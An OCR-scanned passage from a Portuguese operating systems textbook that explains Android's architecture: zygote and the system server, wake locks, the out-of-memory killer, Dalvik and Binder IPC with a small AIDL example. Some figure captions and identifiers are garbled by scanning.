ficiente para que ele possa crescer para ser pelo 
menos tão capaz quanto um sistema operacional 
tradicional. 


10.8.4 Arquitetura Android 


O Android é construído sobre o núcleo do Linux pa- 
drão, com apenas algumas extensões significativas para 
o núcleo em si, que serão discutidas mais tarde. Uma 
vez no espaço usuário, no entanto, sua implementação é 
bastante diferente da distribuição do Linux tradicional e 
usa muitas de suas características que você já compre- 
ende de maneiras muito diferentes. 

Como em um sistema Linux tradicional, o primeiro 
processo do espaço usuário do Android é init, que é a 
raiz de todos os processos. Os daemons que o proces- 
so init do Android inicializa são diferentes, no entanto, 
focados mais em detalhes de baixo nível (gerencia- 
mento de sistemas de arquivos e acesso ao hardware) 
em vez de mecanismos do usuário de nível mais alto 


(cos LE] Hierarquia de processos do Android. 
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como escalonamento de tarefas cron. O Android tam- 
bém tem uma camada adicional de processos, aqueles 
executando o ambiente de linguagem Java Dalvik, que 
são responsáveis por executar todas as partes do sistema 
implementadas em Java. 

A Figura 10.39 ilustra a estrutura de processo básica 
do Android. Primeiro é o processo init, que gera uma 
série de processos de daemon de baixo nível. Um deles 
é zygote, que é a raiz dos processos de linguagem Java 
de nível mais alto. 

O init do Android não executa um shell da maneira 
tradicional, já que um dispositivo de Android típico não 
tem um console local para o acesso do shell. Em vez 
disso, o processo daemon adbd executa por conexões 
remotas (como sobre o USB) que solicitam acesso ao 
shell, criando processos do shell para elas conforme a 
necessidade. 

Tendo em vista que a maior parte do Android é escrita 
na linguagem Java, o daemon zygote e os processos que 
ele inicializa são centrais para o sistema. O primeiro pro- 
cesso zygote sempre inicia e é chamado de system ser- 
ver (serviço de sistema), que contém todos os serviços 
de base do sistema operacional. Partes fundamentais dele 
são o gerenciador de energia, gerenciador de pacotes, ge- 
renciador de janelas e gerenciador de atividades. 

Outros processos serão criados a partir de zygote 
conforme a necessidade. Alguns deles são processos 
“persistentes” que fazem parte do sistema operacional 
básico, como a pilha de telefonia no processo do tele- 
fone, que deve permanecer sempre executando. Proces- 
sos de aplicativos adicionais serão criados e parados 
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conforme a necessidade enquanto o sistema estiver 
executando. 

Os aplicativos interagem com o sistema operacional 
através de chamadas para as bibliotecas fornecidas por 
ele, que juntas compõem o arcabouço do Android. Algu- 
mas dessas bibliotecas podem desempenhar seu trabalho 
dentro daquele processo, mas muitas precisarão desem- 
penhar uma comunicação interprocesso com outros pro- 
cessos, muitas vezes serviços no processo system server. 

A Figura 10.40 mostra o projeto típico para APIs do 
arcabouço Android que interagem com os serviços de 
sistema, nesse caso o gerenciador de pacotes (package 
manager). O gerenciador de pacotes fornece uma API do 
arcabouço para os aplicativos chamarem em seu proces- 
so local, neste caso a classe PackageManager. Interna- 
mente, a classe deve receber uma conexão para o serviço 
correspondente no system server. Para conseguir isso, no 
momento da inicialização o system server publica cada 
serviço sob um nome bem definido no gerenciador de 
serviços (service manager), um daemon inicializado por 
init. O PackageManager no processo aplicativo recupera 
uma conexão do gerenciador de serviços para o seu ser- 
viço de sistema usando aquele mesmo nome. 

Uma vez que o PackageManager tenha se conec- 
tado com o seu serviço de sistema, ele pode fazer cha- 
madas nele. A maioria das chamadas de aplicativos para 
PackageManager é implementada como comunicação 
interprocesso usando o mecanismo IPC do Binder do 
Android, nesse caso fazendo chamadas para a imple- 
mentação PackageManagerService no system server. A 
implementação do PackageManagerService arbitra inte- 
rações através de todas as aplicações de clientes e mantém 
o estado que será necessário para múltiplas aplicações. 


10.8.5 Extensões do Linux 


Na maioria das vezes, o Android inclui um núcleo Li- 
nux comum fornecendo características padrões do Linux. 
A maioria dos aspectos interessantes do Android como 
um sistema operacional está em como as características 
existentes do Linux são usadas. Há também, no entanto, 
diversas extensões significativas relativas ao Linux sobre 
as quais o sistema Android se apoia. 


Wake locks (travas de despertar) 


O gerenciamento de energia em dispositivos móveis 
é diferente daquele dos sistemas de computação tradi- 
cionais, então o Android acrescenta uma nova carac- 
terística para o Linux, chamada travas de despertar 
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(wake locks) (também chamada de suspend blockers, 
isto é, bloqueadores de suspensão) para gerenciar 
como o sistema vai dormir. 

Em um sistema computacional tradicional, o sistema 
pode estar em um de dois estados de energia: executan- 
do e pronto para a entrada do usuário, ou profundamente 
adormecido e incapaz de continuar executando sem um 
interruptor externo como uma chave de luz. Enquanto 
executa, fragmentos secundários do hardware podem 
ser ligados ou desligados conforme a necessidade, mas 
a CPU em si e partes centrais do hardware têm de per- 
manecer no estado ligado para lidar com o tráfego de 
rede que chega e outros eventos dessa natureza. Ir para 
o estado de sono mais profundo é algo que acontece de 
maneira relativamente rara: seja através do usuário co- 
locando explicitamente o sistema para dormir, ou ele 
indo dormir por causa de um intervalo um tanto longo 
de inatividade do usuário. Sair do estado de sono exi- 
ge uma interrupção de hardware de uma fonte externa, 
como pressionar um botão ou um teclado, ponto em que 
o dispositivo vai despertar e ligar sua tela. 

Usuários de dispositivos móveis têm expectativas 
diferentes. Embora o usuário possa desligar a tela de 
uma maneira como se tivesse colocado o dispositivo 
para dormir, o estado de sono tradicional não é real- 
mente desejado. Enquanto sua tela está desligada, o 
dispositivo ainda precisa ser capaz de realizar trabalho: 
ele precisa ser capaz de receber telefonemas, receber e 
processar dados de mensagens de conversa que chegam 
e muitas outras coisas. 

As expectativas em torno de ligar e desligar a tela de 
um dispositivo móvel são também muito mais exigen- 
tes do que em um computador tradicional. A interação 
móvel tende a ocorrer em muitos surtos curtos ao longo 
do dia: você recebe uma mensagem e liga o dispositivo 
para vê-la e talvez enviar uma resposta de uma frase, 
você encontra amigos caminhando com seu cachorro 
novo e liga o dispositivo para tirar uma foto dele. Nesse 
tipo de uso móvel típico, qualquer atraso ao tirar o dis- 
positivo até que ele esteja pronto para usar tem um im- 
pacto negativo significativo na experiência do usuário. 

Dadas essas exigências, uma solução seria simples- 
mente não fazer a CPU ir dormir quando a tela do dispo- 
sitivo está desligada, de maneira que ela esteja sempre 
pronta para ser ligada de volta. O núcleo sabe, afinal 
de contas, quando não há trabalho programado para 
quaisquer threads, e o Linux (assim como a maioria dos 
sistemas operacionais) automaticamente deixará a CPU 
ociosa e usará menos energia nessa situação. 

Uma CPU ociosa, no entanto, não é a mesma coisa 
que o sono de verdade. Por exemplo: 
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1. Em muitos conjuntos de chips o estado ocioso 
usa significativamente mais energia do que em 
um estado de sono verdadeiro. 

2. Uma CPU ociosa pode despertar a qualquer mo- 
mento se algum trabalho tornar-se disponível, 
mesmo que esse trabalho não seja importante. 

3. Apenas ter a CPU ociosa não lhe diz se você pode 
desligar outros hardwares que seriam necessários 
em um verdadeiro sono. 


Travas de despertar no Android permitem que o sis- 
tema entre em um modo de sono mais profundo, sem 
estar vinculado a uma ação explícita do usuário como 
desligar a tela. O estado padrão do sistema com travas 
de despertar é que o dispositivo está dormindo. Quan- 
do o dispositivo está executando, para evitar que ele 
volte a dormir algo precisa estar segurando uma trava 
desperta. 

Enquanto a tela estiver ligada, o sistema sempre 
segura uma trava desperta, que evita que o dispositi- 
vo vá dormir, e então ele seguirá executando, como 
esperamos. 

Quando a tela está desligada, no entanto, o sistema 
em si geralmente não contém uma trava de despertar, 
então ele ficará desperto apenas enquanto algo mais es- 
tiver segurando uma. Quando nenhuma trava de desper- 
tar for mais segura, o sistema vai dormir, e ele pode sair 
do sono somente por uma interrupção de hardware. 


Uma vez que o sistema tenha ido dormir, uma inter- 
rupção de hardware o despertará novamente, como em 
um sistema operacional tradicional. Algumas fontes de 
uma interrupção dessa natureza são alarmes baseados no 
tempo, eventos de um rádio celular (como para uma cha- 
mada que chega), tráfego de rede que chega e pressões 
em determinados botões de hardware (como o botão de 
energia). Tratadores de interrupção para esses eventos 
exigem uma mudança do Linux padrão: eles precisam 
adquirir uma trava de despertar inicial para manter o 
sistema executando após ele tratar a interrupção. 

A trava de despertar adquirida por um tratador de 
interrupção deve ser segura por tempo suficiente para 
transferir o controle para a pilha do driver no núcleo 
que continuará processando o evento. Aquele driver do 
núcleo é então responsável por adquirir a sua própria 
trava de despertar, após a qual a trava de despertar da 
interrupção pode ser seguramente liberada sem risco de 
o sistema voltar a dormir. 

Se o driver vai então entregar esse evento para o 
espaço do usuário, um aperto de mão similar é neces- 
sário. O driver deve assegurar que ele continue a man- 
ter a trava de despertar até que tenha entregue o evento 
para um processo usuário esperando e assegurado que 
houve uma oportunidade ali para adquirir a sua própria 
trava de despertar. Esse fluxo pode continuar pelos sub- 
sistemas no espaço do usuário também; enquanto algo 


estiver segurando uma trava de despertar, continuare- 
mos desempenhando o processamento desejado para 
responder ao evento. Uma vez que travas de despertar 
não sejam mais seguras, no entanto, o sistema inteiro 
volta a dormir e todo o processamento para. 


Matador de falta de memória 


O Linux inclui um “matador de falta de memória” que 
tenta recuperar-se quando a memória está extremamente 
baixa. Situações de falta de memória em sistemas ope- 
racionais modernos são nebulosas. Com a paginação e a 
troca, é raro que as aplicações em si passem por falhas de 
falta de memória. No entanto, o núcleo pode ainda cair 
em uma situação em que ele é incapaz de encontrar pá- 
ginas de RAM quando necessário, não apenas para uma 
alocação nova, mas quando troca ou pagina alguma faixa 
de endereçamento que agora está sendo usada. 

Em uma situação semelhante de baixa memória, o 
matador de falta de memória do Linux padrão é um úl- 
timo recurso para tentar encontrar a RAM de maneira 
que o núcleo possa continuar com o que quer que ele 
esteja fazendo. Isso é feito designando a cada proces- 
so um nível de “maldade” e simplesmente matando o 
processo que é considerado o pior. A maldade de um 
processo é baseada na quantidade de RAM sendo usada 
pelo processo, quanto tempo ele está executando, e ou- 
tros fatores; a meta é matar processos grandes que com 
sorte não são críticos. 

O Android coloca uma pressão especial sobre o mata- 
dor de falta de memória. Ele não tem um espaço de troca, 
então é muito mais comum de estar em situações de falta 
de memória: não há como aliviar a pressão de memória 
exceto liberando páginas de RAM limpas mapeadas do 
armazenamento que foram recentemente usadas. Mesmo 
assim, o Android usa a configuração Linux padrão para 
sobrecomprometer (over-commit) a memória — isto é, 
permitir que espaço de endereçamento seja alocado na 
RAM sem uma garantia que haja RAM disponível para 
dar suporte a ela. Sobrecomprometer é uma ferramenta 
extremamente importante para a otimização do uso da 
memória, tendo em vista que é comum chamar mmap 
para arquivos grandes (como os executáveis) onde você 
estará precisando carregar na RAM pequenas partes dos 
dados contidos naquele arquivo. 

Dada essa situação, o matador de falta de memória 
original do Linux não funciona bem, à medida que ele é 
intencionado mais como um último recurso e tem difi- 
culdade em identificar corretamente bons processos para 
matar. Na realidade, como discutiremos mais tarde, o An- 
droid baseia-se extensivamente no matador de falta de 
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memória executando regularmente para ceifar processos 
e fazer boas escolhas sobre qual selecionar. 

Para lidar com essa situação, o Android introduz o 
seu próprio matador de falta de memória para o nú- 
cleo, com diferentes semânticas e objetivos de proje- 
to. O matador de falta de memória do Android executa 
muito mais agressivamente sempre que a RAM estiver 
ficando “baixa”. A RAM baixa é identificada por um 
parâmetro através de um parâmetro configurável indi- 
cando quanta RAM livre de cache disponível no núcleo 
é aceitável. Quando o sistema cai abaixo desse limi- 
te, o matador de falta de memória executa para liberar 
RAM de outra parte. A meta é assegurar que o sistema 
jamais entre em estados de paginação ruins, que podem 
impactar negativamente a experiência do usuário quan- 
do aplicações em primeiro plano estão competindo por 
RAM, tendo em vista que sua execução se torna muito 
mais lenta devido à constante paginação para dentro e 
para fora. 

Em vez de tentar adivinhar quais processos devem 
ser mortos, o matador de falta de memória do Android 
conta muito estritamente com informações fornecidas a 
ele pelo espaço do usuário. O matador de falta de me- 
mória do Linux tradicional tem um parâmetro oom adj 
por processo que pode ser usado para guiá-lo na direção 
do melhor processo para matar modificando o escore 
de maldade geral do processo. O matador de falta de 
memória do Android usa o mesmo parâmetro, mas uma 
ordem estrita: processos com um oom adj mais alto 
sempre serão eliminados antes daqueles com mais bai- 
xos. Discutiremos mais tarde como o sistema Android 
decide como designar escores. 


10.8.6 Dalvik 


O Dalvik implementa o ambiente da linguagem Java 
no Android que é responsável por executar aplicações 
assim como a maior parte do seu código de sistema. 
Quase tudo no processo system service — do gerencia- 
dor de pacote, passando pelo gerenciador de janelas ao 
gerenciador de atividades — é implementado com códi- 
go de linguagem Java executado por Dalvik. 

O Android não é, no entanto, uma plataforma de lin- 
guagem Java no sentido tradicional. O código Java em 
uma aplicação Android é fornecido no formato bytecode 
do Dalvik, baseado em torno de uma máquina de regis- 
tros em vez do bytecode baseado em pilha tradicional 
do Java. O formato do bytecode do Dalvik permite uma 
interpretação mais rápida, enquanto ainda dá suporte à 
compilação JIT (Just in Time). O bytecode do Dalvik 
também é mais eficiente em termos de espaço, tanto no 
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disco, quanto na RAM, através do uso de reservatórios 
(pool) de strings e outras técnicas. 

Ao escrever aplicações para Android, o código fonte 
é escrito em Java e então compilado em bytecode de 
Java padrão usando ferramentas Java tradicionais. O 
Android então introduz um novo passo: converter aque- 
le bytecode de Java em uma representação de bytecode 
mais compacta do Dalvik. É a versão em bytecode do 
Dalvik de uma aplicação que é colocado em um pacote 
como o binário de aplicação final e em última análise 
instalada no dispositivo. 

A arquitetura do Android se baseia muito no Linux 
para primitivas do sistema, incluindo gerenciamento de 
memória, segurança e comunicação através de frontei- 
ras de segurança. Ele não usa a linguagem Java para 
conceitos de sistemas operacionais — há poucas tenta- 
tivas de abstrair esses aspectos importantes do sistema 
operacional Linux subjacente. 

Vale observar o uso de processos por parte do An- 
droid. O projeto do Android não se baseia na linguagem 
Java para o isolamento entre aplicativos e o sistema, 
mas em vez disso assume a abordagem de sistema ope- 
racional tradicional do isolamento de processos. Isso 
significa que cada aplicação está executando em seu 
próprio processo Linux com seu próprio ambiente Dal- 
vik, assim como o system server e outras partes cen- 
trais da plataforma que são escritos em Java. 

A utilização de processos para esse isolamento per- 
mite que o Android alavanque todas as características 
do Linux para o gerenciamento de processos, do isola- 
mento de memória à limpeza de todos os recursos asso- 
ciados com um processo quando ele vai embora. Além 
dos processos, em vez de usar a arquitetura Security Ma- 
nager do Java, o Android baseia-se muito nas caracteris- 
ticas de segurança do Linux. 

O uso de processos do Linux e segurança simplifi- 
ca muito o ambiente de Dalvik, tendo em vista que ele 
não é mais responsável por aqueles aspectos críticos da 
estabilidade e robustez do sistema. De maneira não in- 
cidental, ele também permite que as aplicações usem 
livremente código nativo em sua implementação, o que 
é especialmente importante para jogos que são em geral 
construídos com motores (engines) baseados em C++. 

Misturar processos e a linguagem Java dessa manei- 
ra introduz alguns desafios. Levantar um novo ambiente 
de linguagem Java pode levar um segundo, mesmo em 
hardwares móveis modernos. Lembre-se de que um dos 
objetivos de projeto do Android é ser capaz de lançar 
rapidamente aplicações, com uma meta de 200 ms. Exi- 
gir que um processo Dalvik fresco seja trazido para essa 
nova aplicação estaria muito além do orçamento. Um 


lançamento de 200 ms é difícil de se atingir no hard- 
ware móvel, mesmo sem precisar inicializar um novo 
ambiente de linguagem Java. 

A solução para esse problema é o daemon nativo 
zygote que já mencionamos brevemente. Zygote é res- 
ponsável por levantar e inicializar Dalvik, ao ponto em 
que ele está pronto para começar a executar um código 
de sistema ou aplicação escrito em Java. Todos os novos 
processos baseados em Dalvik (sistema ou aplicação) 
são criados do zygote, permitindo que eles comecem a 
execução com o ambiente já pronto para seguir. 

Não é apenas o Dalvik que o zygote desperta. O 
zygote também pré-carrega muitas partes do arcabouço 
Android que são comumente usadas no sistema e apli- 
cações, assim como o carregamento de recursos e outras 
coisas que são muitas vezes necessárias. 

Observe que criar um novo processo a partir de 
zygote envolve um fork do Linux, mas não há uma cha- 
mada exec. O novo processo é uma réplica do processo 
zygote original, com todo o seu estado pré-inicializado 
já configurado e pronto para ação. A Figura 10.41 ilus- 
tra como um processo de aplicação Java novo é relacio- 
nado ao processo zygote original. Após o fork, o novo 
processo tem o seu próprio ambiente Dalvik separado, 
embora ele esteja compartilhando de todos os dados 
pré-carregados e inicializados com zygote através das 
páginas com cópia na escrita. Só o que falta para ter o 
novo processo em execução pronto para partir é dar a 
ele sua identidade correta (UID etc.), terminar qualquer 
inicialização do Dalvik que requer iniciar threads e car- 
regar a aplicação ou código de sistema a ser executado. 

Além de proporcionar velocidade, há outro benefi- 
cio que o zygote traz. Como apenas um fork é usado 
para criar processos a partir dele, o grande número de 
páginas RAM sujas necessárias para criar Dalvik e pré- 
-carregar classes e recursos podem ser compartilhados 
entre zygote e todos os seus processos filhos. Esse com- 
partilhamento é especialmente importante para o am- 
biente do Android, onde a troca da memória não está 
disponível; a paginação por demanda de páginas limpas 
(como o código executável) de “disco” (memória flash) 
está disponível. No entanto, quaisquer páginas sujas 
devem ficar bloqueadas na RAM; elas não podem ser 
paginadas para o “disco”. 


10.8.7 IPC Binder 


O projeto do sistema Android gira significativa- 
mente em torno do isolamento de processos, entre 
aplicações, assim como entre diferentes partes do pró- 
prio sistema em si. Isso exige uma grande quantidade 
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de comunicação interprocesso para coordenar os dife- 
rentes processos, o que pode exigir uma grande quan- 
tidade de trabalho para implementar e acertar. O 
mecanismo de comunicação interprocesso Binder do 
Android é uma funcionalidade de IPC de propósito 
geral sobre a qual a maior parte do sistema Android 
é construída. 


le Arquitetura IPC do Binder. 


Cópia na 
escrita 


Capítulo 10 ESTUDO DE CASO 1: UNIX, LINUX E ANDROID | 565 


Processo do aplicativo 








Classes de aplicação 
e recursos 





Recursos pré-carregados 













Classes pré-carregadas 


Dalvik 








A arquitetura Binder é dividida em três camadas, 
mostradas na Figura 10.42. Na parte de baixo da pilha 
há um módulo de núcleo que implementa a interação 
entre processos real e a expõe através da função ioctl 
do núcleo (ioctl é uma chamada de núcleo de propósito 
geral para enviar comandos customizados para drivers 
e módulos de núcleo). Sobre o módulo do núcleo há 
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uma API básica de espaço do usuario orientada a ob- 
jetos, permitindo que as aplicações criem e interajam 
com os pontos finais (endpoints) do IPC através das 
classes [Binder e Binder. No topo há um modelo de 
programação baseado em interface onde as aplicações 
declaram suas interfaces de IPC e não se preocupam 
mais com os detalhes de como o IPC acontece nas ca- 
madas mais baixas. 


O módulo de núcleo do Binder 


Em vez de usar as funcionalidades de IPC do Linux 
como pipes, o Binder inclui um módulo de núcleo es- 
pecial que implementa seu próprio mecanismo de IPC. 
O modelo de IPC do Binder é bastante diferente dos 
mecanismos Linux tradicionais a ponto de não poder ser 
eficientemente implementado sobre eles puramente no 
espaço do usuário. Além disso, o Android não suporta 
a maioria das primitivas do System V entre processos 
(semáforos, segmentos de memória compartilhada, fi- 
las de mensagens), pois eles não proporcionam uma se- 
mântica robusta para limpar seus recursos de aplicações 
maliciosas ou com defeitos. 

O modelo IPC básico do Binder usa a RPC (remote 
procedure call — chamada de procedimento remota). Isto 
é, o processo de envio ocorre submetendo uma operação 
de IPC completa para o núcleo, que é executada no proces- 
so receptor; o emissor pode ficar bloqueado enquanto o re- 
ceptor executa, permitindo que o resultado seja retornado 
da chamada. (Opcionalmente emissores podem especificar 
que eles não deveriam ser bloqueados, continuando a sua 
execução em paralelo com o receptor.) O IPC do Binder 
é, desse modo, baseado em mensagens, como as filas de 
mensagens do System V, em vez de baseado em fluxos 
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como nos pipes Linux. Uma mensagem no Binder é referi- 
da como uma transação, e em um nível mais alto pode ser 
vista como uma chamada de função através de processos. 

Cada transação que o espaço do usuário submete ao 
núcleo é uma operação completa: ela identifica o alvo 
da operação e a identidade do emissor também, à me- 
dida que os dados completos estão sendo entregues. O 
núcleo determina o processo apropriado para receber 
aquela transação, entregando-a um thread que está es- 
perando no processo. 

A Figura 10.43 ilustra o fluxo básico da transação. 
Qualquer thread no processo de origem pode criar uma 
transação identificando o seu alvo, e submeter isso ao 
núcleo. O núcleo faz uma cópia da transação, adicio- 
nando a ela a identidade do emissor. Ele determina qual 
processo é responsável pelo alvo da transação e desper- 
ta um thread no processo para recebê-lo. Uma vez que 
o processo receptor esteja executando, ele determina o 
alvo apropriado da transação e o entrega. 

(Para a discussão aqui, estamos simplificando a ma- 
neira como os dados de transações se movimentam atra- 
vés do sistema como duas cópias, uma no núcleo e outra 
no espaço de endereçamento do processo. A implemen- 
tação real faz isso em uma cópia. Para cada processo 
que pode receber as transações, o núcleo cria uma área 
de memória compartilhada com ele. Quando ele está 
lidando com uma transação, ele primeiro determina o 
processo que estará recebendo aquela transação e copia 
os dados diretamente para aquele espaço de endereça- 
mento compartilhado.) 

Observe que cada processo na Figura 10.43 tem um 
“pool de threads”. Trata-se de um ou mais threads cria- 
dos pelo espaço do usuário para lidar com transações 
que chegam. O núcleo vai despachar cada transação 
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que chega para um thread atualmente esperando para 
trabalhar no pool de threads do processo. Chamadas 
para o núcleo de um processo emissor, no entanto, não 
precisam vir do pool de threads — qualquer thread no 
processo é livre para iniciar a transação, como Ta na 
Figura 10.43. 

Já vimos que as transações passadas para o nú- 
cleo identificam um objeto alvo; no entanto, o núcleo 
deve determinar o processo receptor. Para conseguir 
isso, o núcleo controla os objetos disponíveis em cada 
processo e os mapeia para outros processos, como 
mostrado na Figura 10.44. Os objetos que estamos 
examinando aqui são simplesmente localizações no 
espaço de endereçamento daquele processo. O núcleo 
apenas controla esses endereços de objetos, sem um 
significado ligado a eles; eles podem ser a localização 
de uma estrutura de dados C, objeto C++, ou qualquer 
coisa localizada no espaço de endereçamento daquele 
processo. 

Referências a objetos em processos remotos são 
identificados por um inteiro handle, que é muito pare- 
cido com um descritor de arquivos Linux. Por exemplo, 
considere Objeto2a no Processo 2 — esse é conhecido 
pelo núcleo por estar associado com o Processo 2, e mais 
adiante o núcleo designou o Handle 2 para o Processo 1. 
O Processo 1 pode então submeter uma transação para o 
núcleo focado para seu Handle 2, e a partir daí o núcleo 
pode determinar que está sendo enviado para o Processo 
2 e especificamente Objeto2a naquele processo. 

Também, assim como os descritores de arquivos, 
o valor de um handle em um processo não significa a 
mesma coisa que aquele valor em outro processo. Por 
exemplo, na Figura 10.44, podemos ver que no Pro- 
cesso 1, um valor de handle de 2 identifica o Objeto2a; 
no entanto, no Processo 2, esse mesmo valor de handle de 
2 identifica Objeto la. Além disso, é impossível para um 
processo acessar um objeto em outro processo se o nú- 
cleo não designou um handle para ele naquele processo. 


lc TALES Mapeamento de objeto entre processos do Binder. 
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De novo, na Figura 10.44, podemos ver que o Objeto2b 
do Processo? é conhecido pelo núcleo, mas nenhuma 
handle foi designada para ele para o Processo 1. Desse 
modo, não há um caminho para o Processo 1 acessar 
aquele objeto, mesmo que o núcleo tenha designado 
handles para ele para outros processos. 

Como essas associações de handle-para-objeto são 
estabelecidas em primeiro lugar? Ao contrário dos des- 
critores de arquivos do Linux, os processos do usuá- 
rio não pedem diretamente por handles. Em vez disso, 
o núcleo designa handles para os processos conforme 
a necessidade. Esse processo está ilustrado na Figura 
10.45. Aqui estamos olhando para como a referência 
para Objetolb de Processo 2 para Processo 1 na figura 
anterior pode ter ocorrido. A chave para isso é como 
uma transação flui através do sistema, da esquerda para 
a direita na parte de baixo da figura. 

Os passos fundamentais mostrados na Figura 10.45 são: 


1. Processo 1 cria a estrutura de transação inicial, 
que contém o endereço local Objeto 1b. 

2. Processo 1 submete a transação ao núcleo. 

3. O núcleo examina os dados na transação, encon- 
tra o endereço Objeto/b e cria uma nova entrada 
para ele, tendo em vista que ele não conhecia pre- 
viamente esse endereço. 


4. O núcleo usa o alvo da transação, Handle 2, para 
determinar que isso é intencionado para o Obje- 
to2a que está no Processo 2. 

5. O núcleo agora reescreve o cabeçalho da transa- 
ção para ser apropriado para o Processo 2, mu- 
dando seu alvo para o endereço Objeto2a. 

6. O núcleo da mesma maneira reescreve os dados 
de transação para o processo alvo; aqui ele acha 
que o Objeto lb ainda não é conhecido de Proces- 
so 2, então um novo Handle 3 é criado para ele. 

7. A transação reescrita é entregue para o Processo 
2 para execução. 
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8. Ao receber a transação, o processo descobre que 
há um novo Handle 3 e acrescenta isso à sua ta- 
bela de handles disponiveis. 


Se um objeto em uma transação já é conhecido do 
processo receptor, o fluxo é similar, exceto que agora o 
núcleo só precisa rescrever a transação de maneira que 
ela contenha o handle previamente designado ou o pon- 
teiro do objeto local do processo receptor. Isso significa 
que enviar o mesmo objeto para um processo múltiplas 
vezes sempre resultará na mesma identidade, diferen- 
temente dos descritores de arquivos Linux onde abrir 
o mesmo arquivo múltiplas vezes alocará um descritor 
diferente a cada vez. O sistema IPC do Binder mantém 
identidades de objeto únicas como aqueles objetos que 
se movem entre processos. 

A arquitetura do Binder essencialmente introduz um 
modelo de segurança baseado em capacidades para o 
Linux. Cada objeto Binder é uma capacidade. Enviar 
um objeto para outro processo concede essa capacidade 
para o processo. O processo receptor pode então fazer 
uso de quaisquer características que o objeto fornecer. 
Um processo pode enviar um objeto para outro proces- 
so, mais tarde receber um objeto de qualquer processo 
e identificar se aquele objeto recebido é exatamente o 
mesmo objeto que ele enviou. 


API de espaço usuário do Binder 


A maioria do código de espaço usuário não interage 
diretamente com o módulo do núcleo Binder. Em vez 
disso, há uma biblioteca orientada a objetos no espaço 
do usuário que fornece uma API mais simples. O pri- 
meiro nível dessas APIs de espaço usuário mapeia de 
maneira ligeiramente direta para os conceitos de núcleo 
que cobrimos até aqui, na forma de três classes: 


1. IBinder é uma interface abstrata para um obje- 
to Binder. Seu método fundamental é transact, 
que submente uma transação para o objeto. A im- 
plementação recebendo a transação pode ser um 
objeto no processo local ou em outro processo; 
se ele for em outro processo, isso será entregue 
através do módulo núcleo do Binder como discu- 
tido anteriormente. 

2. Binder é um objeto Binder concreto. Implemen- 
tar uma subclasse Binder proporciona a você uma 
classe que pode ser chamada por outros proces- 
sos. Seu método chave é onTransact, que recebe 
uma transação que foi enviada para ele. A prin- 
cipal responsabilidade de uma subclasse Binder 
é observar os dados de transação que ele recebe 
aqui e realizar a operação apropriada. 

3. Parcel é um contêiner para leitura e escrita de 
dados que está em uma transação Binder. Ele 
tem métodos para leitura e escrita de dados di- 
gitados — inteiros, cadeias, arranjos — mas de 
maneira mais importante, ele pode ler e escrever 
referências para qualquer objeto /Binder, usan- 
do a estrutura de dados apropriada para o núcleo 
compreender e transportar aquela referência por 
meio de processos. 


A Figura 10.46 descreve como essas classes funcio- 
nam juntas, modificando a Figura 10.44 que havíamos 
examinado previamente com as classes de espaço usu- 
ário que são usadas. Aqui vemos que Binderlb e Bin- 
der2a são casos de subclasses Binder concretas. Para 
realizar um IPC, um processo agora cria um Parcel 
contendo os dados desejados, e o envia através de outra 
classe que não vimos ainda, BinderProxy. Essa classe 
é criada sempre que um handle novo aparece em um 
processo, desse modo fornecendo uma implementação 
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do [Binder cujo método transact cria a transação apro- 
priada para a chamada e a submete ao núcleo. 

A estrutura de transação do núcleo que examinamos 
previamente é desse modo dividida nas APIs do espa- 
ço usuário: o alvo é representado por um BinderProxy 
e seus dados são contidos em um Parcel. A transação 
flui através do núcleo como já vimos e, ao aparecer no 
espaço usuário no processo receptor, seu alvo é usado 
para determinar o objeto Binder receptor apropriado en- 
quanto um Parcel é construído a partir de seus dados e 
entregue para o método onTransact daquele objeto. 

Essas três classes facilitam escrever o código IPC 
agora: 


1. Subclasse de Binder. 

2. Implementar onTransact para descodificar e exe- 
cutar chamadas que chegam. 

3. Implementar códigos correspondentes para criar 
um Parcel que possa ser passado para aquele mé- 
todo transact do objeto. 


A maior parte desse trabalho encontra-se nos úl- 
timos dois passos. Ele é o código unmarshalling e 
marshalling, que é necessário para transformar como 
preferiríamos programar — usando chamadas de mé- 
todo simples — em operações que são necessárias para 
executar um IPC. Trata-se de um código chato e que 
pode levar a erros ao ser escrito, então gostaríamos que 
o computador cuidasse disso. 


Interfaces Binder e AIDL 


A parte final do IPC Binder é aquela que é mais se- 
guidamente usada, um modelo de programação baseado 
em interfaces. Em vez de lidar com objetos Binder e 
dados Parcel, aqui temos de pensar em termos de inter- 
faces e métodos. 


O principal fragmento dessa camada é uma ferra- 
menta de linha de comando chamada AIDL (para An- 
droid Interface Definition Language — Linguagem 
de definição de interface Android). Essa ferramenta é 
um compilador de interface, tomando uma descrição 
abstrata de uma interface e gerando dela o código fonte 
necessário para definir aquela interface e implementar 
o marshalling apropriado e o código unmarshalling ne- 
cessário para fazer chamadas remotas com ele. 

A Figura 10.47 mostra um exemplo simples de uma 
interface definida em AIDL. Essa interface é chamada 
de [Example e contém um único método, print, que re- 
cebe um único argumento String. 

Uma descrição de interface com essa na Figura 10.47 
é compilada pelo AIDL para gerar três classes de lin- 
guagem Java ilustradas na Figura 10.48. 


1. [Example fornece a definição de interface da lin- 
guagem Java. 

2. IExample.Stub é a classe base para a imple- 
mentação dessa interface. Ela herda do Binder, 
significando que pode ser recipiente das chama- 
das IPC; ela herda de IExample, tendo em vis- 
ta que essa é a interface sendo implementada. O 
propósito dessa classe é realizar unmarshalling: 
transformar chamadas onTransact que chegam 
na chamada de método apropriada de /Example. 
Uma subclasse dela é então responsável apenas 
por implementar os métodos /Example. 


lc ELEY Interface simples descrita em AIDL. 


package com.example 


interface IExample { 
void print(String msg); 
} 
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ia (e1U)sy-Walee-t Hierarquia de herança da interface Binder. 






IExample.Stub 


IExample 


lExample.Proxy 





o 


3. IExample.Proxy é o outro lado da chamada IPC, 
responsável por desempenhar o marshalling da 
chamada. Trata-se de uma implementação con- 
creta do /Example, implementando cada método 
dele para transformar a chamada nos conteúdos 
de Parcel apropriados e enviá-los através de uma 
chamada transact em um /Binder com quem esta 
se comunicando. 


Com essas classes no lugar, nao ha mais necessidade 
de preocupar-se com os mecanismos de um IPC. Imple- 
mentadores da interface [Example apenas derivam do 
IExample.Stub e implementam os métodos da interface 
como eles fariam normalmente. Chamadores receberão 
uma interface de [Example que é implementada por 
IExample.Proxy, permitindo que eles façam chamadas 
regulares na interface. 

A maneira que esses fragmentos funcionam juntos 
para realizar uma operação IPC completa é mostrada 
na Figura 10.49. Uma chamada print simples em uma 
interface Example transforma-se em: 


1. [Example.Proxy empacota a chamada de método 
em uma Parcel, chamando transact no Binder- 
Proxy subjacente. 


leia LR] Caminho completo de um IPC Binder baseado em AIDI. 
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transact({print hello) ps Núcleo 





